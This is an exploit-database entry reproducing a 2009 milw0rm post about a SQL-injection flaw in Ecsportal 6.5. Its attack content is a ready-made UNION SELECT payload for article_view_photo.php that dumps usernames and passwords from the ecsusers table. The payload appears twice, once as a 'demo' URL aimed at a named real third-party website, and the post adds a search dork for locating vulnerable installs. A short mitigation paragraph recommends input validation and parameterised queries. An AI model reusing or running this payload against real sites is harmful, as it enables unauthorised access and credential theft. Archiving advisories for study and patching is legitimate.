Ecsportal 6.5 - SQL-injection Vulnerability

vendor:

ecsportal

by:

taRentReXx

7,5

CVSS

HIGH

SQL-injection

CWE

Product Name: ecsportal

Affected Version From: 6.5

Affected Version To: 6.5

Patch Exists: NO

Related CWE: N/A

CPE: a:econtentsys:ecsportal

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ecsportal 6.5 – SQL-injection Vulnerability

A SQL-injection vulnerability exists in Ecsportal 6.5. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains malicious SQL code that can be executed by the application, allowing the attacker to gain access to sensitive information such as usernames and passwords. The vulnerable file is article_view_photo.php and the exploit code is: article_view_photo.php?id=-999%20union%20all%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54%20from%20ecsusers%20limit%200,1--

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ecsportal 6.5 - SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@~~=======================================~~@
!  ============taRentReXx===============    !
       The Indian Hacker
@~~=======================================~~@

@~~=Author   : taRentReXx

@~~=Email    : darkxr00tx@gmail.com

@~~===============INDIAN=================~~@


@~~=======================================~~@
@~~=Script   : Ecsportal 6.5

@~~=S.Site   : http://www.econtentsys.gr/

@~~=Dork     : Power with ecsportal rel 6.5
@~~=======================================~~@


@~~=Vul file :article_view_photo.php


@~~=Exploit :-

        

        article_view_photo.php?id=-999%20union%20all%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54%20from%20ecsusers%20limit%200,1--


        !demo!
        
        http://www.cretaquarium.gr/article_view_photo.php?id=-999%20union%20all%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54%20from%20ecsusers%20limit%200,1--




@~~=======================================~~@
@~~=======================================~~@

Greetz to all muslim brothers.
to all indians
TO str0ke

@~~===============INDIAN=================~~@

# milw0rm.com [2009-06-01]